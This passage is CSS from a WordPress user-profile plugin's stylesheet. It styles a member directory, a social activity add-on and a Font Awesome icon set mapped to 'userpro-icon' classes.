3%; margin: 0 0 20px 0 !important; } div.emd-main { float: left; letter-spacing: 0 !important; color: #666 !important; margin: 0 0 20px 0 !important; } div.emd-main-0 {width: 100% !important;} div.emd-main-1 {width: 75% !important;} div.emd-main div.userpro-paginate.top {margin: 0 0 40px 0 !important} div.userpro-paginate { text-align: center !important; } div.userpro-paginate a:hover {text-decoration: none !important} /* filters */ div.emd-head { font-weight: bold; color: #333 !important; } div.emd-foot { font-size: 11px !important; border-top: 1px solid #ddd; padding: 15px 0 0 0 !important; } div.emd-filter {padding: 0 0 12px 0} div.emd-filter-head { background: #eee; color: #666 !important; font-size: 11px !important; border-radius: 3px !important; padding: 2px 8px; margin: 12px 0 !important; } /* radio and checkbox */ div.emd-filters label { width: 100%; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; display: block; cursor: pointer !important; height: 16px !important; line-height: 16px !important; color: #666 !important; position: relative;padding: 0 25px;display:inline-block; font-size: 11px; } div.emd-filters label:hover {text-decoration: underline !important} div.emd-filters label.userpro-radio input[type=radio], div.emd-filters label.userpro-checkbox input[type=checkbox]{display: none !important} div.emd-filters label.userpro-radio span, div.emd-filters label.userpro-checkbox span { position: absolute; top: 0; left: 0; width: 16px; height: 16px; } /* users list */ div.emd-list *, div.emd-list-empty * {margin: 0!important;padding: 0 !important;line-height: 1em !important;text-decoration: none !important} div.emd-user { float: left; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; border: 1px solid #e5e5e5; border-radius: 3px; padding: 0 0 10px 0 !important; margin: 0 0 20px 0% !important; box-shadow: 0 1px 4px #ddd !important; } div.emd-user-img a:hover{opacity: 0.7} div.emd-user-img img{ width: 100%; height: auto; border: none !important; box-shadow: none !important; border-radius: 3px 3px 0 0!important; } div.emd-user-info {padding: 10px 10px 0 10px !important} div.emd-user-left {float: left;} div.emd-user-left a { font-size: 12px !important; line-height: 18px !important; color: #444 !important; text-decoration: none !important; font-weight: bold !important; } div.emd-user-left a:hover {text-decoration: underline !important} div.emd-user-right { float: right; } div.emd-user-bio { padding: 0 10px !important; font-size: 11px !important; line-height: 18px !important; color: #999 !important; } div.emd-user-column { padding: 2px 10px 0 10px !important; font-size: 11px !important; } div.emd-user-column div.emd-user-left{line-height: 18px !important;} div.emd-user-column div.emd-user-right {line-height: 18px !important;} div.emd-user-icons { margin: 10px 0 0 0 !important; padding: 10px 0 0 0 !important; border-top: 1px solid #e5e5e5; } div.emd-list div.emd-user div.emd-user-icons a.userpro-profile-icon { width: 26px !important; height: 26px !important; line-height: 26px !important; font-size: 14px !important; margin: 0 2px !important; } /********************************************************** SOCIAL ADDON CSS ******************************************************************/ div.userpro-sc-bar { border-bottom: 1px solid #eee; } a.userpro-count-link { float: left; display: block; padding: 10px 15px; font-size: 12px !important; line-height: 18px !important; } a.userpro-count-link span { font-weight: bold; margin: 0 0 0 0 !important; } /* left - right */ div.userpro-sc-left { float: right; } div.userpro-sc-right { float: left; padding: 6px 0 0 15px; } div.userpro-sc-right a.userpro-button { font-size: 11px !important; margin: 0 !important; padding: 0px 8px !important; border-radius: 3px !important; height: 25px !important; line-height: 25px !important; top: 0px !important; } a.userpro-button i {margin: 0 0 0 6px !important;font-size: 14px !important;} /* users */ div.userpro-sc { padding: 15px; border-bottom: 1px solid #eee; position: relative; } div.userpro-sc:last-child {border-bottom: 0 !important;} div.userpro-sc-noborder {border-bottom: 0 !important;} div.userpro-sc-btn { position: absolute; left: 0; top: 15px; } div.userpro-sc-img { float: right; margin: 0 0 0 15px; } div.userpro-sc-img a:hover {opacity: 0.8 !important} div.userpro-sc-img img { display: block; overflow: hidden; box-shadow: none !important; border-radius: 3px; max-width: 40px; max-height: 40px; } div.userpro-sc-i { padding-left: 80px; margin: 0 55px 0 0; } div.userpro-sc-i-name a { font-size: 14px; font-weight: bold; color: #333 !important; } div.userpro-sc-i-name a:hover {text-decoration: underline !important} div.userpro-sc-i-icons {padding: 8px 0 0 0;} div.userpro-sc-i-bio { font-size: 12px !important; line-height: 20px !important; color: #999 !important; } /* status */ span.userpro-sc-i-info { margin: 0 4px 0 0; } span.userpro-sc-i-info a { display: inline-block !important; font-size: 12px !important; font-weight: normal; color: #336699 !important; } span.userpro-sc-i-info a:hover {text-decoration: underline !important} span.userpro-sc-i-sp { font-size: 12px; display: block !important; padding: 4px 0 0 0; } div.userpro-sc-i-time { margin: 2px 0 0 0; font-size: 11px; color: #aaa; } /* misc */ div.userpro-sc-flw { display: block; margin: 9px 0 0 0; } /* load more activity or refresh activity */ a.userpro-button.userpro-sc-refresh { margin: 0 !important; padding: 0px 8px!important; border-radius: 3px !important; position: absolute !important; left: 15px !important; top: 9px !important; } a.userpro-button.userpro-sc-refresh:active{ position: absolute !important; left: 15px !important; top: 9px !important; } div.userpro-right img.userpro-sc-refresh-loader { display: none; } div.userpro-sc-load { text-align: center; padding: 15px; } div.userpro-sc-load img.userpro-sc-loader{ display: none; } /* Font-Awesome */ @font-face{font-family:'FontAwesome';src:url('font/fontawesome-webfont.eot?v=4.7.0');src:url('font/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('font/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('font/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('font/fontawesome-webfont.svg#fontawesomeregular?v=4.7.0') format('svg');font-weight:normal;font-style:normal;}[class^="userpro-icon-"],[class*=" userpro-icon-"]{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;-webkit-font-smoothing:antialiased;*margin-right:.3em;} [class^="userpro-icon-"]:before,[class*=" userpro-icon-"]:before{text-decoration:inherit;display:inline-block;speak:none;} .userpro-icon-large:before{vertical-align:-10%;font-size:1.3333333333333333em;} a [class^="userpro-icon-"],a [class*=" userpro-icon-"]{display:inline;} [class^="userpro-icon-"].userpro-icon-fixed-width,[class*=" userpro-icon-"].userpro-icon-fixed-width{display:inline-block;width:1.1428571428571428em;text-align:right;padding-right:0.2857142857142857em;}[class^="userpro-icon-"].userpro-icon-fixed-width.userpro-icon-large,[class*=" userpro-icon-"].userpro-icon-fixed-width.userpro-icon-large{width:1.4285714285714286em;} .icons-ul{margin-left:2.142857142857143em;list-style-type:none;}.icons-ul>li{position:relative;} .icons-ul .userpro-icon-li{position:absolute;left:-2.142857142857143em;width:2.142857142857143em;text-align:center;line-height:inherit;} [class^="userpro-icon-"].hide,[class*=" userpro-icon-"].hide{display:none;} .userpro-icon-muted{color:#eeeeee;} .userpro-icon-light{color:#ffffff;} .userpro-icon-dark{color:#333333;} .userpro-icon-border{border:solid 1px #eeeeee;padding:.2em .25em .15em;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;} .userpro-icon-2x{font-size:2em;}.userpro-icon-2x.userpro-icon-border{border-width:2px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;} .userpro-icon-3x{font-size:3em;}.userpro-icon-3x.userpro-icon-border{border-width:3px;-webkit-border-radius:5px;-moz-border-radius:5px;border-radius:5px;} .userpro-icon-4x{font-size:4em;}.userpro-icon-4x.userpro-icon-border{border-width:4px;-webkit-border-radius:6px;-moz-border-radius:6px;border-radius:6px;} .userpro-icon-5x{font-size:5em;}.userpro-icon-5x.userpro-icon-border{border-width:5px;-webkit-border-radius:7px;-moz-border-radius:7px;border-radius:7px;} .pull-right{float:right;} .pull-left{float:left;} [class^="userpro-icon-"].pull-left,[class*=" userpro-icon-"].pull-left{margin-right:.3em;} [class^="userpro-icon-"].pull-right,[class*=" userpro-icon-"].pull-right{margin-left:.3em;} [class^="userpro-icon-"],[class*=" userpro-icon-"]{display:inline;width:auto;height:auto;line-height:normal;vertical-align:baseline;background-image:none;background-position:0% 0%;background-repeat:repeat;margin-top:0;} .userpro-icon-white,.nav-pills>.active>a>[class^="userpro-icon-"],.nav-pills>.active>a>[class*=" userpro-icon-"],.nav-list>.active>a>[class^="userpro-icon-"],.nav-list>.active>a>[class*=" userpro-icon-"],.navbar-inverse .nav>.active>a>[class^="userpro-icon-"],.navbar-inverse .nav>.active>a>[class*=" userpro-icon-"],.dropdown-menu>li>a:hover>[class^="userpro-icon-"],.dropdown-menu>li>a:hover>[class*=" userpro-icon-"],.dropdown-menu>.active>a>[class^="userpro-icon-"],.dropdown-menu>.active>a>[class*=" userpro-icon-"],.dropdown-submenu:hover>a>[class^="userpro-icon-"],.dropdown-submenu:hover>a>[class*=" userpro-icon-"]{background-image:none;} .btn [class^="userpro-icon-"].userpro-icon-large,.nav [class^="userpro-icon-"].userpro-icon-large,.btn [class*=" userpro-icon-"].userpro-icon-large,.nav [class*=" userpro-icon-"].userpro-icon-large{line-height:.9em;} .btn [class^="userpro-icon-"].userpro-icon-spin,.nav [class^="userpro-icon-"].userpro-icon-spin,.btn [class*=" userpro-icon-"].userpro-icon-spin,.nav [class*=" userpro-icon-"].userpro-icon-spin{display:inline-block;} .nav-tabs [class^="userpro-icon-"],.nav-pills [class^="userpro-icon-"],.nav-tabs [class*=" userpro-icon-"],.nav-pills [class*=" userpro-icon-"],.nav-tabs [class^="userpro-icon-"].userpro-icon-large,.nav-pills [class^="userpro-icon-"].userpro-icon-large,.nav-tabs [class*=" userpro-icon-"].userpro-icon-large,.nav-pills [class*=" userpro-icon-"].userpro-icon-large{line-height:.9em;} .btn [class^="userpro-icon-"].pull-left.userpro-icon-2x,.btn [class*=" userpro-icon-"].pull-left.userpro-icon-2x,.btn [class^="userpro-icon-"].pull-right.userpro-icon-2x,.btn [class*=" userpro-icon-"].pull-right.userpro-icon-2x{margin-top:.18em;} .btn [class^="userpro-icon-"].userpro-icon-spin.userpro-icon-large,.btn [class*=" userpro-icon-"].userpro-icon-spin.userpro-icon-large{line-height:.8em;} .btn.btn-small [class^="userpro-icon-"].pull-left.userpro-icon-2x,.btn.btn-small [class*=" userpro-icon-"].pull-left.userpro-icon-2x,.btn.btn-small [class^="userpro-icon-"].pull-right.userpro-icon-2x,.btn.btn-small [class*=" userpro-icon-"].pull-right.userpro-icon-2x{margin-top:.25em;} .btn.btn-large [class^="userpro-icon-"],.btn.btn-large [class*=" userpro-icon-"]{margin-top:0;}.btn.btn-large [class^="userpro-icon-"].pull-left.userpro-icon-2x,.btn.btn-large [class*=" userpro-icon-"].pull-left.userpro-icon-2x,.btn.btn-large [class^="userpro-icon-"].pull-right.userpro-icon-2x,.btn.btn-large [class*=" userpro-icon-"].pull-right.userpro-icon-2x{margin-top:.05em;} .btn.btn-large [class^="userpro-icon-"].pull-left.userpro-icon-2x,.btn.btn-large [class*=" userpro-icon-"].pull-left.userpro-icon-2x{margin-right:.2em;} .btn.btn-large [class^="userpro-icon-"].pull-right.userpro-icon-2x,.btn.btn-large [class*=" userpro-icon-"].pull-right.userpro-icon-2x{margin-left:.2em;} .nav-list [class^="userpro-icon-"],.nav-list [class*=" userpro-icon-"]{line-height:inherit;} .userpro-icon-stack{position:relative;display:inline-block;width:2em;height:2em;line-height:2em;vertical-align:-35%;}.userpro-icon-stack [class^="userpro-icon-"],.userpro-icon-stack [class*=" userpro-icon-"]{display:block;text-align:center;position:absolute;width:100%;height:100%;font-size:1em;line-height:inherit;*line-height:2em;} .userpro-icon-stack .userpro-icon-stack-base{font-size:2em;*line-height:1em;} .userpro-icon-spin{display:inline-block;-moz-animation:spin 2s infinite linear;-o-animation:spin 2s infinite linear;-webkit-animation:spin 2s infinite linear;animation:spin 2s infinite linear;} a .userpro-icon-stack,a .userpro-icon-spin{display:inline-block;text-decoration:none;} @-moz-keyframes spin{0%{-moz-transform:rotate(0deg);} 100%{-moz-transform:rotate(359deg);}}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg);} 100%{-webkit-transform:rotate(359deg);}}@-o-keyframes spin{0%{-o-transform:rotate(0deg);} 100%{-o-transform:rotate(359deg);}}@-ms-keyframes spin{0%{-ms-transform:rotate(0deg);} 100%{-ms-transform:rotate(359deg);}}@keyframes spin{0%{transform:rotate(0deg);} 100%{transform:rotate(359deg);}}.userpro-icon-rotate-90:before{-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);-o-transform:rotate(90deg);transform:rotate(90deg);filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=1);} .userpro-icon-rotate-180:before{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-ms-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg);filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2);} .userpro-icon-rotate-270:before{-webkit-transform:rotate(270deg);-moz-transform:rotate(270deg);-ms-transform:rotate(270deg);-o-transform:rotate(270deg);transform:rotate(270deg);filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=3);} .userpro-icon-flip-horizontal:before{-webkit-transform:scale(-1, 1);-moz-transform:scale(-1, 1);-ms-transform:scale(-1, 1);-o-transform:scale(-1, 1);transform:scale(-1, 1);} .userpro-icon-flip-vertical:before{-webkit-transform:scale(1, -1);-moz-transform:scale(1, -1);-ms-transform:scale(1, -1);-o-transform:scale(1, -1);transform:scale(1, -1);} a .userpro-icon-rotate-90:before,a .userpro-icon-rotate-180:before,a .userpro-icon-rotate-270:before,a .userpro-icon-flip-horizontal:before,a .userpro-icon-flip-vertical:before{display:inline-block;} /* Font Awesome 4.4.0*/ .userpro-icon-glass:before{content:"\f000"}.userpro-icon-music:before{content:"\f001"}.userpro-icon-search:before{content:"\f002"}.userpro-icon-envelope-alt:before{content:"\f003"}.userpro-icon-connection:before{content:"\f0c1";color:#fff}.userpro-icon-heart:before{content:"\f004"}.userpro-icon-star:before{content:"\f005"}.userpro-icon-star-empty:before{content:"\f006"}.userpro-icon-user:before{content:"\f007"}.userpro-icon-film:before{content:"\f008"}.userpro-icon-th-large:before{content:"\f009"}.userpro-icon-th:before{content:"\f00a"}.userpro-icon-th-list:before{content:"\f00b"}.userpro-icon-ok:before{content:"\f00c"}.userpro .icon-ok:before{content:none}.userpro-icon-remove:before{content:"\f00d"}.userpro-icon-zoom-in:before{content:"\f00e"}.userpro-icon-zoom-out:before{content:"\f010"}.userpro-icon-off:before,.userpro-icon-power-off:before{content:"\f011"}.userpro-icon-signal:before{content:"\f012"}.userpro-icon-cog:before,.userpro-icon-gear:before{content:"\f013"}.userpro-icon-trash:before{content:"\f014"}.userpro-icon-home:before{content:"\f015"}.userpro-icon-file-alt:before{content:"\f016"}.userpro-icon-time:before{content:"\f017"}.userpro-icon-road:before{content:"\f018"}.userpro-icon-download-alt:before{content:"\f019"}.userpro-icon-download:before{content:"\f01a"}.userpro-icon-upload:before{content:"\f01b"}.userpro-icon-inbox:before{content:"\f01c"}.userpro-icon-play-circle:before{content:"\f01d"}.userpro-icon-repeat:before,.userpro-icon-rotate-right:before{content:"\f01e"}.userpro-icon-refresh:before{content:"\f021"}.userpro-icon-list-alt:before{content:"\f022"}.userpro-icon-lock:before{content:"\f023"}.userpro-icon-flag:before{content:"\f024"}.userpro-icon-headphones:before{content:"\f025"}.userpro-icon-volume-off:before{content:"\f026"}.userpro-icon-volume-down:before{content:"\f027"}.userpro-icon-volume-up:before{content:"\f028"}.userpro-icon-qrcode:before{content:"\f029"}.userpro-icon-barcode:before{content:"\f02a"}.userpro-icon-tag:before{content:"\f02b"}.userpro-icon-tags:before{content:"\f02c"}.userpro-icon-book:before{content:"\f02d"}.userpro-icon-bookmark:before{content:"\f02e"}.userpro-icon-print:before{content:"\f02f"}.userpro-icon-camera:before{content:"\f030"}.userpro-icon-font:before{content:"\f031"}.userpro-icon-bold:before{content:"\f032"}.userpro-icon-italic:before{content:"\f033"}.userpro-icon-text-height:before{content:"\f034"}.userpro-icon-text-width:before{content:"\f035"}.userpro-icon-align-left:before{content:"\f036"}.userpro-icon-align-center:before{content:"\f037"}.userpro-icon-align-right:before{content:"\f038"}.userpro-icon-align-justify:before{content:"\f039"}.userpro-icon-list:before{content:"\f03a"}.userpro-icon-indent-left:before{content:"\f03b"}.userpro-icon-indent-right:before{content:"\f03c"}.userpro-icon-facetime-video:before{content:"\f03d"}.userpro-icon-picture:before{content:"\f03e"}.userpro-icon-pencil:before{content:"\f040"}.userpro-icon-map-marker:before{content:"\f041"}.userpro-icon-adjust:before{content:"\f042"}.userpro-icon-tint:before{content:"\f043"}.userpro-icon-edit:before{content:"\f044"}.userpro-icon-share:before{content:"\f045"}.userpro-icon-check:before{content:"\f046"}.userpro-icon-move:before{content:"\f047"}.userpro-icon-step-backward:before{content:"\f048"}.userpro-icon-fast-backward:before{content:"\f049"}.userpro-icon-backward:before{content:"\f04a"}.userpro-icon-play:before{content:"\f04b"}.userpro-icon-pause:before{content:"\f04c"}.userpro-icon-stop:before{content:"\f04d"}.userpro-icon-forward:before{content:"\f04e"}.userpro-icon-fast-forward:before{content:"\f050"}.userpro-icon-step-forward:before{content:"\f051"}.userpro-icon-eject:before{content:"\f052"}.userpro-icon-chevron-left:before{content:"\f053"}.userpro-icon-chevron-right:before{content:"\f054"}.userpro-icon-plus-sign:before{content:"\f055"}.userpro-icon-minus-sign:before{content:"\f056"}.userpro-icon-remove-sign:before{content:"\f057"}.userpro-icon-ok-sign:before{content:"\f058"}.userpro-icon-question-sign:before{content:"\f059"}.userpro-icon-info-sign:before{content:"\f05a"}.userpro-icon-screenshot:before{content:"\f05b"}.userpro-icon-remove-circle:before{content:"\f05c"}.userpro-icon-ok-circle:before{content:"\f05d"}.userpro-icon-ban-circle:before{content:"\f05e"}.userpro-icon-arrow-left:before{content:"\f060"}.userpro-icon-arrow-right:before{content:"\f061"}.userpro-icon-arrow-up:before{content:"\f062"}.userpro-icon-arrow-down:before{content:"\f063"}.userpro-icon-mail-forward:before,.userpro-icon-share-alt:before{content:"\f064"}.userpro-icon-resize-full:before{content:"\f065"}.userpro-icon-resize-small:before{content:"\f066"}.userpro-icon-plus:before{content:"\f067"}.userpro-icon-minus:before{content:"\f068"}.userpro-icon-asterisk:before{content:"\f069"}.userpro-icon-exclamation-sign:before{content:"\f06a"}.userpro-icon-gift:before{content:"\f06b"}.userpro-icon-leaf:before{content:"\f06c"}.userpro-icon-fire:before{content:"\f06d"}.userpro-icon-eye-open:before{content:"\f06e"}.userpro-icon-eye-close:before{content:"\f070"}.userpro-icon-warning-sign:before{content:"\f071"}.userpro-icon-plane:before{content:"\f072"}.userpro-icon-calendar:before{content:"\f073"}.userpro-icon-random:before{content:"\f074"}.userpro-icon-comment:before{content:"\f075"}.userpro-icon-magnet:before{content:"\f076"}.userpro-icon-chevron-up:before{content:"\f077"}.userpro-icon-chevron-down:before{content:"\f078"}.userpro-icon-retweet:before{content:"\f079"}.userpro-icon-shopping-cart:before{content:"\f07a"}.userpro-icon-folder-close:before{content:"\f07b"}.userpro-icon-folder-open:before{content:"\f07c"}.userpro-icon-resize-vertical:before{content:"\f07d"}.userpro-icon-resize-horizontal:before{content:"\f07e"}.userpro-icon-bar-chart:before{content:"\f080"}.userpro-icon-twitter-sign:before{content:"\f081"}.userpro-icon-facebook-sign:before{content:"\f082"}.userpro-icon-camera-retro:before{content:"\f083"}.userpro-icon-key:before{content:"\f084"}.userpro-icon-cogs:before,.userpro-icon-gears:before{content:"\f085"}.userpro-icon-comments:before{content:"\f086"}.userpro-icon-thumbs-up-alt:before{content:"\f087"}.userpro-icon-thumbs-down-alt:before{content:"\f088"}.userpro-icon-star-half:before{content:"\f089"}.userpro-icon-heart-empty:before{content:"\f08a"}.userpro-icon-signout:before{content:"\f08b"}.userpro-icon-linkedin-sign:before{content:"\f08c"}.userpro-icon-pushpin:before{content:"\f08d"}.userpro-icon-external-link:before{content:"\f08e"}.userpro-icon-signin:before{content:"\f090"}.userpro-icon-trophy:before{content:"\f091"}.userpro-icon-github-sign:before{content:"\f092"}.userpro-icon-upload-alt:before{content:"\f093"}.userpro-icon-lemon:before{content:"\f094"}.userpro-icon-phone:before{content:"\f095"}.userpro-icon-check-empty:before,.userpro-icon-unchecked:before{content:"\f096"}.userpro-icon-bookmark-empty:before{content:"\f097"}.userpro-icon-phone-sign:before{content:"\f098"}.userpro-icon-twitter:before{content:"\f099"}.userpro-icon-facebook:before{content:"\f09a"}.userpro-icon-github:before{content:"\f09b"}.userpro-icon-unlock:before{content:"\f09c"}.userpro-icon-credit-card:before{content:"\f09d"}.userpro-icon-rss:before{content:"\f09e"}.userpro-icon-hdd:before{content:"\f0a0"}.userpro-icon-bullhorn:before{content:"\f0a1"}.userpro-icon-bell:before{content:"\f0a2"}.userpro-icon-certificate:before{content:"\f0a3"}.userpro-icon-hand-right:before{content:"\f0a4"}.userpro-icon-hand-left:before{content:"\f0a5"}.userpro-icon-hand-up:before{content:"\f0a6"}.userpro-icon-hand-down:before{content:"\f0a7"}.userpro-icon-circle-arrow-left:before{content:"\f0a8"}.userpro-icon-circle-arrow-right:before{content:"\f0a9"}.userpro-icon-circle-arrow-up:before{content:"\f0aa"}.userpro-icon-circle-arrow-down:before{content:"\f0ab"}.userpro-icon-globe:before{content:"\f0ac"}.userpro-icon-wrench:before{content:"\f0ad"}.userpro-icon-tasks:before{content:"\f0ae"}.userpro-icon-filter:before{content:"\f0b0"}.userpro-icon-briefcase:before{content:"\f0b1"}.userpro-icon-fullscreen:before{content:"\f0b2"}.userpro-icon-group:before{content:"\f0c0"}.userpro-icon-link:before{content:"\f0c1"}.userpro-icon-cloud:before{content:"\f0c2"}.userpro-icon-beaker:before{content:"\f0c3"}.userpro-icon-cut:before{content:"\f0c4"}.userpro-icon-copy:before{content:"\f0c5"}.userpro-icon-paper-clip:before,.userpro-icon-paperclip:before{content:"\f0c6"}.userpro-icon-save:before{content:"\f0c7"}.userpro-icon-sign-blank:before{content:"\f0c8"}.userpro-icon-reorder:before{content:"\f0c9"}.userpro-icon-list-ul:before{content:"\f0ca"}.userpro-icon-list-ol:before{content:"\f0cb"}.userpro-icon-strikethrough:before{content:"\f0cc"}.userpro-icon-underline:before{content:"\f0cd"}.userpro-icon-table:before{content:"\f0ce"}.userpro-icon-magic:before{content:"\f0d0"}.userpro-icon-truck:before{content:"\f0d1"}.userpro-icon-pinterest:before{content:"\f0d2"}.userpro-icon-pinterest-sign:before{content:"\f0d3"}.userpro-icon-google-plus-sign:before{content:"\f0d4"}.userpro-icon-google-plus:before{content:"\f0d5"}.userpro-icon-money:before{content:"\f0d6"}.userpro-icon-caret-down:before{content:"\f0d7"}.userpro-icon-caret-up:before{content:"\f0d8"}.userpro-icon-caret-left:before{content:"\f0d9"}.userpro-icon-caret-right:before{content:"\f0da"}.userpro-icon-columns:before{content:"\f0db"}.userpro-icon-sort:before{content:"\f0dc"}.userpro-icon-sort-down:before{content:"\f0dd"}.userpro-icon-sort-up:before{content:"\f0de"}.userpro-icon-envelope:before{content:"\f0e0"}.userpro-icon-linkedin:before{content:"\f0e1"}.userpro-icon-rotate-left:before,.userpro-icon-undo:before{content:"\f0e2"}.userpro-icon-legal:before{content:"\f0e3"}.userpro-icon-dashboard:before{content:"\f0e4"}.userpro-icon-comment-alt:before{content:"\f0e5"}.userpro-icon-comments-alt:before{content:"\f0e6"}.userpro-icon-bolt:before{content:"\f0e7"}.userpro-icon-sitemap:before{content:"\f0e8"}.userpro-icon-umbrella:before{content:"\f0e9"}.userpro-icon-paste:before{content:"\f0ea"}.userpro-icon-lightbulb:before{content:"\f0eb"}.userpro-icon-exchange:before{content:"\f0ec"}.userpro-icon-cloud-download:before{content:"\f0ed"}.userpro-icon-cloud-upload:before{content:"\f0ee"}.userpro-icon-user-md:before{content:"\f0f0"}.userpro-icon-stethoscope:before{content:"\f0f1"}.userpro-icon-suitcase:before{content:"\f0f2"}.userpro-icon-bell-alt:before{content:"\f0f3"}.userpro-icon-coffee:before{content:"\f0f4"}.userpro-icon-food:before{content:"\f0f5"}.userpro-icon-file-text-alt:before{content:"\f0f6"}.userpro-icon-building:before{content:"\f0f7"}.userpro-icon-hospital:before{content:"\f0f8"}.userpro-icon-ambulance:before{content:"\f0f9"}.userpro-icon-medkit:before{content:"\f0fa"}.userpro-icon-fighter-jet:before{content:"\f0fb"}.userpro-icon-beer:before{content:"\f0fc"}.userpro-icon-h-sign:before{content:"\f0fd"}.userpro-icon-plus-sign-alt:before{content:"\f0fe"}.userpro-icon-double-angle-left:before{content:"\f100"}.userpro-icon-double-angle-right:before{content:"\f101"}.userpro-icon-double-angle-up:before{content:"\f102"}.userpro-icon-double-angle-down:before{content:"\f103"}.userpro-icon-angle-left:before{content:"\f104"}.userpro-icon-angle-right:before{content:"\f105"}.userpro-icon-angle-up:before{content:"\f106"}.userpro-icon-angle-down:before{content:"\f107"}.userpro-icon-desktop:before{content:"\f108"}.userpro-icon-laptop:before{content:"\f109"}.userpro-icon-tablet:before{content:"\f10a"}.userpro-icon-mobile-phone:before{content:"\f10b"}.userpro-icon-circle-blank:before{content:"\f10c"}.userpro-icon-quote-left:before{content:"\f10d"}.userpro-icon-quote-right:before{content:"\f10e"}.userpro-icon-spinner:before{content:"\f110"}.userpro-icon-circle:before{content:"\f111"}.userpro-icon-mail-reply:before,.userpro-icon-reply:before{content:"\f112"}.userpro-icon-github-alt:before{content:"\f113"}.userpro-icon-folder-close-alt:before{content:"\f114"}.userpro-icon-folder-open-alt:before{content:"\f115"}.userpro-icon-expand-alt:before{content:"\f116"}.userpro-icon-collapse-alt:before{content:"\f117"}.userpro-icon-smile:before{content:"\f118"}.userpro-icon-frown:before{content:"\f119"}.userpro-icon-meh:before{content:"\f11a"}.userpro-icon-gamepad:before{content:"\f11b"}.userpro-icon-keyboard:before{content:"\f11c"}.userpro-icon-flag-alt:before{content:"\f11d"}.userpro-icon-flag-checkered:before{content:"\f11e"}.userpro-icon-terminal:before{content:"\f120"}.userpro-icon-code:before{content:"\f121"}.userpro-icon-mail-reply-all:before,.userpro-icon-reply-all:before{content:"\f122"}.userpro-icon-star-half-empty:before,.userpro-icon-star-half-full:before{content:"\f123"}.userpro-icon-location-arrow:before{content:"\f124"}.userpro-icon-crop:before{content:"\f125"}.userpro-icon-code-fork:before{content:"\f126"}.userpro-icon-unlink:before{content:"\f127"}.userpro-icon-question:before{content:"\f128"}.userpro-icon-info:before{content:"\f129"}.userpro-icon-exclamation:before{content:"\f12a"}.userpro-icon-superscript:before{content:"\f12b"}.userpro-icon-subscript:before{content:"\f12c"}.userpro-icon-eraser:before{content:"\f12d"}.userpro-icon-puzzle-piece:before{content:"\f12e"}.userpro-icon-microphone:before{content:"\f130"}.userpro-icon-microphone-off:before{content:"\f131"}.userpro-icon-shield:before{content:"\f132"}.userpro-icon-calendar-empty:before{content:"\f133"}.userpro-icon-fire-extinguisher:before{content:"\f134"}.userpro-icon-rocket:before{content:"\f135"}.userpro-icon-maxcdn:before{content:"\f136"}.userpro-icon-chevron-sign-left:before{content:"\f137"}.userpro-icon-chevron-sign-right:before{content:"\f138"}.userpro-icon-chevron-sign-up:before{content:"\f139"}.userpro-icon-chevron-sign-down:before{content:"\f13a"}.userpro-icon-html5:before{content:"\f13b"}.userpro-icon-css3:before{content:"\f13c"}.userpro-icon-anchor:before{content:"\f13d"}.userpro-icon-unlock-alt:before{content:"\f13e"}.userpro-icon-bullseye:before{content:"\f140"}.userpro-icon-ellipsis-horizontal:before{content:"\f141"}.userpro-icon-ellipsis-vertical:before{content:"\f142"}.userpro-icon-rss-sign:before{content:"\f143"}.userpro-icon-play-sign:before{content:"\f144"}.userpro-icon-ticket:before{content:"\f145"}.userpro-icon-minus-sign-alt:before{content:"\f146"}.userpro-icon-check-minus:before{content:"\f147"}.userpro-icon-level-up:before{content:"\f148"}.userpro-icon-level-down:before{content:"\f149"}.userpro-icon-check-sign:before{content:"\f14a"}.userpro-icon-edit-sign:before{content:"\f14b"}.userpro-icon-external-link-sign:before{content:"\f14c"}.userpro-icon-share-sign:before{content:"\f14d"}.userpro-icon-compass:before{content:"\f14e"}.userpro-icon-collapse:before{content:"\f150"}.userpro-icon-collapse-top:before{content:"\f151"}.userpro-icon-expand:before{content:"\f152"}.userpro-icon-eur:before,.userpro-icon-euro:before{content:"\f153"}.userpro-icon-gbp:before{content:"\f154"}.userpro-icon-dollar:before,.userpro-icon-usd:before{content:"\f155"}.userpro-icon-inr:before,.userpro-icon-rupee:before{content:"\f156"}.userpro-icon-jpy:before,.userpro-icon-yen:before{content:"\f157"}.userpro-icon-cny:before,.userpro-icon-renminbi:before{content:"\f158"}.userpro-icon-krw:before,.userpro-icon-won:before{content:"\f159"}.userpro-icon-bitcoin:before,.userpro-icon-btc:before{content:"\f15a"}.userpro-icon-file:before{content:"\f15b"}.userpro-icon-file-text:before{content:"\f15c"}.userpro-icon-sort-by-alphabet:before{content:"\f15d"}.userpro-icon-sort-by-alphabet-alt:before{content:"\f15e"}.userpro-icon-sort-by-attributes:before{content:"\f160"}.userpro-icon-sort-by-attributes-alt:before{content:"\f161"}.userpro-icon-sort-by-order:before{content:"\f162"}.userpro-icon-sort-by-order-alt:before{content:"\f163"}.userpro-icon-thumbs-up:before{content:"\f164"}.userpro-icon-thumbs-down:before{content:"\f165"}.userpro-icon-youtube-sign:before{content:"\f166"}.userpro-icon-youtube:before{content:"\f167"}.userpro-icon-xing:before{content:"\f168"}.userpro-icon-xing-sign:before{content:"\f169"}.userpro-icon-youtube-play:before{content:"\f16a"}.userpro-icon-dropbox:before{content:"\f16b"}.userpro-icon-stackexchange:before{content:"\f16c"}.userpro-icon-instagram:before{content:"\f16d"}.userpro-icon-flickr:before{content:"\f16e"}.userpro-icon-adn:before{content:"\f170"}.userpro-icon-bitbucket:before{content:"\f171"}.userpro-icon-bitbucket-sign:before{content:"\f172"}.userpro-icon-tumblr:before{content:"\f173"}.userpro-icon-tumblr-sign:before{content:"\f174"}.userpro-icon-long-arro